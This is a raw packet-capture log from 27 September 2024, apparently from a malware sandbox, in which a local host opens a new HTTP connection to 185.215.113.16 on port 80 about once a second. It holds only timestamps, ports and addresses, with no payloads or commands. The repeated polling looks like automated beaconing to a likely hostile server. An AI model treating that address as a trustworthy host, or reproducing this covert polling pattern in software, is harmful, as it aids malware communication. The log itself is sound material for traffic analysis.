Sep 27, 2024 19:05:14.739782095 CEST	62768	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:14.853238106 CEST	62768	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:14.853533030 CEST	62769	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:14.858367920 CEST	80	62769	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:14.858437061 CEST	62769	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:14.858547926 CEST	62769	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:14.858608007 CEST	80	62768	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:14.858654976 CEST	62768	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:14.863334894 CEST	80	62769	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:15.617336988 CEST	80	62769	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:15.617413998 CEST	62769	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:15.618117094 CEST	62769	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:15.626878977 CEST	80	62769	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:15.846216917 CEST	80	62769	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:15.846328974 CEST	62769	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:15.962805986 CEST	62769	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:15.963088989 CEST	62770	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:15.970751047 CEST	80	62769	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:15.970830917 CEST	62769	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:15.970877886 CEST	80	62770	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:15.970966101 CEST	62770	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:15.971127033 CEST	62770	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:15.978862047 CEST	80	62770	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:16.686966896 CEST	80	62770	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:16.687130928 CEST	62770	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:16.718168020 CEST	62770	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:16.723558903 CEST	80	62770	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:16.942694902 CEST	80	62770	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:16.942751884 CEST	62770	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:17.063450098 CEST	62770	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:17.063762903 CEST	62771	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:17.069545984 CEST	80	62770	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:17.069645882 CEST	80	62771	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:17.069713116 CEST	62770	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:17.069749117 CEST	62771	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:17.070034027 CEST	62771	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:17.075557947 CEST	80	62771	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:17.791604996 CEST	80	62771	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:17.791821957 CEST	62771	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:17.792372942 CEST	62771	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:17.798424959 CEST	80	62771	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:18.222332001 CEST	80	62771	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:18.222454071 CEST	62771	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:18.337776899 CEST	62771	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:18.338104963 CEST	62772	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:18.342921972 CEST	80	62771	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:18.342935085 CEST	80	62772	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:18.342999935 CEST	62771	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:18.343040943 CEST	62772	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:18.343193054 CEST	62772	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:18.347949982 CEST	80	62772	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:19.042541027 CEST	80	62772	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:19.042598963 CEST	62772	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:19.043361902 CEST	62772	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:19.048146009 CEST	80	62772	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:19.267927885 CEST	80	62772	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:19.268016100 CEST	62772	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:19.370954037 CEST	62772	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:19.371488094 CEST	62773	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:19.376091003 CEST	80	62772	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:19.376147985 CEST	62772	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:19.376224995 CEST	80	62773	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:19.376287937 CEST	62773	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:19.376429081 CEST	62773	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:19.381144047 CEST	80	62773	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:20.093755007 CEST	80	62773	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:20.093817949 CEST	62773	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:20.102241039 CEST	62773	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:20.107043982 CEST	80	62773	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:20.335776091 CEST	80	62773	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:20.335870028 CEST	62773	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:20.447091103 CEST	62773	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:20.447424889 CEST	62774	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:20.452400923 CEST	80	62774	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:20.452438116 CEST	80	62773	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:20.452490091 CEST	62774	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:20.452526093 CEST	62773	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:20.452722073 CEST	62774	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:20.457540989 CEST	80	62774	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:21.143999100 CEST	80	62774	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:21.144074917 CEST	62774	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:21.147187948 CEST	62774	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:21.152455091 CEST	80	62774	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:21.376091003 CEST	80	62774	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:21.376143932 CEST	62774	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:21.478353977 CEST	62774	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:21.478765011 CEST	62775	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:21.483442068 CEST	80	62774	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:21.483516932 CEST	62774	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:21.483649969 CEST	80	62775	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:21.483726978 CEST	62775	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:21.483911037 CEST	62775	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:21.488626003 CEST	80	62775	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:22.193558931 CEST	80	62775	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:22.193679094 CEST	62775	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:22.194367886 CEST	62775	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:22.199220896 CEST	80	62775	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:22.421060085 CEST	80	62775	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:22.421132088 CEST	62775	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:22.525285006 CEST	62775	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:22.525614023 CEST	62776	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:22.530541897 CEST	80	62776	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:22.530766964 CEST	62776	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:22.530816078 CEST	80	62775	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:22.530873060 CEST	62775	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:22.531008005 CEST	62776	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:22.535803080 CEST	80	62776	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:23.255934954 CEST	80	62776	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:23.256020069 CEST	62776	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:23.256836891 CEST	62776	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:23.262115955 CEST	80	62776	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:23.485796928 CEST	80	62776	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:23.485867023 CEST	62776	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:23.587860107 CEST	62776	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:23.588198900 CEST	62777	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:23.593147993 CEST	80	62776	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:23.593298912 CEST	62776	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:23.593456984 CEST	80	62777	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:23.593588114 CEST	62777	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:23.593913078 CEST	62777	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:23.598938942 CEST	80	62777	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:24.396785975 CEST	80	62777	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:24.396893024 CEST	62777	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:24.397521973 CEST	62777	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:24.402918100 CEST	80	62777	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:24.621591091 CEST	80	62777	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:24.621646881 CEST	62777	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:24.728509903 CEST	62777	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:24.728859901 CEST	62778	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:24.733855009 CEST	80	62778	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:24.733944893 CEST	80	62777	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:24.733953953 CEST	62778	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:24.733992100 CEST	62777	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:24.734201908 CEST	62778	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:24.739490986 CEST	80	62778	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:25.629631996 CEST	80	62778	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:25.629739046 CEST	62778	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:25.630772114 CEST	62778	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:25.865909100 CEST	80	62778	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:25.865994930 CEST	62778	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:25.867918968 CEST	80	62778	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:26.091207027 CEST	80	62778	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:26.091417074 CEST	62778	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:26.197509050 CEST	62778	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:26.197819948 CEST	62779	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:26.202660084 CEST	80	62778	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:26.202742100 CEST	62778	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:26.202956915 CEST	80	62779	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:26.203032970 CEST	62779	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:26.203278065 CEST	62779	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:26.208141088 CEST	80	62779	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:26.896487951 CEST	80	62779	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:26.896559954 CEST	62779	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:26.897238016 CEST	62779	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:26.902156115 CEST	80	62779	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:27.120228052 CEST	80	62779	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:27.120476007 CEST	62779	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:27.228537083 CEST	62779	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:27.228872061 CEST	62780	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:27.235512018 CEST	80	62779	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:27.235615015 CEST	62779	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:27.236048937 CEST	80	62780	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:27.236120939 CEST	62780	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:27.236238956 CEST	62780	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:27.241238117 CEST	80	62780	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:27.977377892 CEST	80	62780	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:27.979851007 CEST	62780	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:27.991801977 CEST	62780	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:27.996709108 CEST	80	62780	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:28.227736950 CEST	80	62780	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:28.227840900 CEST	62780	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:28.338043928 CEST	62780	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:28.338363886 CEST	62781	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:28.344304085 CEST	80	62781	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:28.344368935 CEST	62781	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:28.344413996 CEST	80	62780	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:28.344456911 CEST	62780	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:28.344547987 CEST	62781	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:28.350986958 CEST	80	62781	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:29.044981956 CEST	80	62781	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:29.045109987 CEST	62781	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:29.089663029 CEST	62781	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:29.096947908 CEST	80	62781	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:29.317178011 CEST	80	62781	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:29.317277908 CEST	62781	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:29.433006048 CEST	62781	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:29.433273077 CEST	62782	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:29.592740059 CEST	80	62782	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:29.592780113 CEST	80	62781	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:29.592860937 CEST	62782	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:29.592931986 CEST	62781	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:29.593097925 CEST	62782	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:29.598859072 CEST	80	62782	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:30.302067041 CEST	80	62782	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:30.302269936 CEST	62782	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:30.302994013 CEST	62782	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:30.309082031 CEST	80	62782	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:30.535983086 CEST	80	62782	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:30.536195040 CEST	62782	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:30.650506020 CEST	62782	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:30.650676966 CEST	62783	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:30.655540943 CEST	80	62783	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:30.655611992 CEST	62783	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:30.655656099 CEST	80	62782	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:30.655698061 CEST	62782	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:30.655736923 CEST	62783	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:30.660480976 CEST	80	62783	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:31.391613960 CEST	80	62783	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:31.391674042 CEST	62783	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:31.394906044 CEST	62783	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:31.400564909 CEST	80	62783	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:31.632481098 CEST	80	62783	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:31.632627964 CEST	62783	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:31.745610952 CEST	62783	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:31.749129057 CEST	62784	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:31.750773907 CEST	80	62783	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:31.750828028 CEST	62783	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:31.754053116 CEST	80	62784	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:31.754137039 CEST	62784	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:31.757313967 CEST	62784	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:31.762103081 CEST	80	62784	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:32.466902018 CEST	80	62784	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:32.466996908 CEST	62784	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:32.468005896 CEST	62784	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:32.472896099 CEST	80	62784	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:32.697851896 CEST	80	62784	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:32.697982073 CEST	62784	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:32.806636095 CEST	62784	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:32.807070971 CEST	62785	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:32.812529087 CEST	80	62784	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:32.812546015 CEST	80	62785	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:32.812633038 CEST	62784	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:32.812655926 CEST	62785	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:32.812783003 CEST	62785	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:32.817955017 CEST	80	62785	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:33.505606890 CEST	80	62785	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:33.505708933 CEST	62785	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:33.506508112 CEST	62785	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:33.511368036 CEST	80	62785	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:33.729070902 CEST	80	62785	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:33.729167938 CEST	62785	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:33.838079929 CEST	62785	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:33.838397980 CEST	62786	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:33.843226910 CEST	80	62786	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:33.843312025 CEST	62786	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:33.843405008 CEST	80	62785	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:33.843455076 CEST	62785	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:33.843513012 CEST	62786	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:33.848252058 CEST	80	62786	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:34.536292076 CEST	80	62786	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:34.536391973 CEST	62786	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:34.537298918 CEST	62786	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:34.542057991 CEST	80	62786	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:34.759916067 CEST	80	62786	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:34.760066986 CEST	62786	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:34.868984938 CEST	62786	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:34.869297028 CEST	62787	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:34.874139071 CEST	80	62786	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:34.874202967 CEST	62786	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:34.874270916 CEST	80	62787	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:34.874347925 CEST	62787	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:34.874448061 CEST	62787	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:34.879395962 CEST	80	62787	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:35.564917088 CEST	80	62787	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:35.565013885 CEST	62787	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:35.566376925 CEST	62787	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:35.571248055 CEST	80	62787	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:35.790292025 CEST	80	62787	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:35.790395021 CEST	62787	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:35.900717974 CEST	62787	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:35.901025057 CEST	62788	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:35.906501055 CEST	80	62787	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:35.906564951 CEST	62787	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:35.906574011 CEST	80	62788	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:35.906644106 CEST	62788	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:35.906795979 CEST	62788	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:35.914561987 CEST	80	62788	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:36.805506945 CEST	80	62788	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:36.805591106 CEST	62788	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:36.806343079 CEST	62788	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:36.811141014 CEST	80	62788	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:37.041392088 CEST	80	62788	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:37.041452885 CEST	62788	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:37.174618959 CEST	62788	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:37.174953938 CEST	62789	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:37.179828882 CEST	80	62789	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:37.179902077 CEST	62789	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:37.179910898 CEST	80	62788	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:37.179950953 CEST	62788	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:37.190538883 CEST	62789	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:37.195313931 CEST	80	62789	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:37.904227972 CEST	80	62789	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:37.904311895 CEST	62789	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:37.904932022 CEST	62789	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:37.910445929 CEST	80	62789	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:38.133568048 CEST	80	62789	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:38.133755922 CEST	62789	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:38.245935917 CEST	62789	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:38.246225119 CEST	62790	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:38.253005981 CEST	80	62790	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:38.253020048 CEST	80	62789	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:38.253114939 CEST	62789	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:38.253225088 CEST	62790	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:38.253225088 CEST	62790	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:38.259016991 CEST	80	62790	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:38.944102049 CEST	80	62790	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:38.944168091 CEST	62790	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:38.944865942 CEST	62790	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:38.951144934 CEST	80	62790	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:39.169862032 CEST	80	62790	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:39.170010090 CEST	62790	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:39.275451899 CEST	62790	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:39.275717974 CEST	62791	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:39.280642033 CEST	80	62791	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:39.280678988 CEST	80	62790	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:39.280747890 CEST	62791	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:39.280766964 CEST	62790	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:39.280857086 CEST	62791	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:39.285672903 CEST	80	62791	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:39.982755899 CEST	80	62791	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:39.982925892 CEST	62791	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:39.983638048 CEST	62791	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:39.988493919 CEST	80	62791	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:40.462874889 CEST	80	62791	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:40.462960958 CEST	62791	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:40.572143078 CEST	62791	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:40.572468996 CEST	62792	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:40.577862978 CEST	80	62792	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:40.577955008 CEST	62792	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:40.577981949 CEST	80	62791	185.215.113.16	192.168.2.4
Sep 27, 2024 19:05:40.578032970 CEST	62791	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:40.578200102 CEST	62792	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:05:40.582940102 CEST	80	62792	185.215.113.16	192.168.2.4
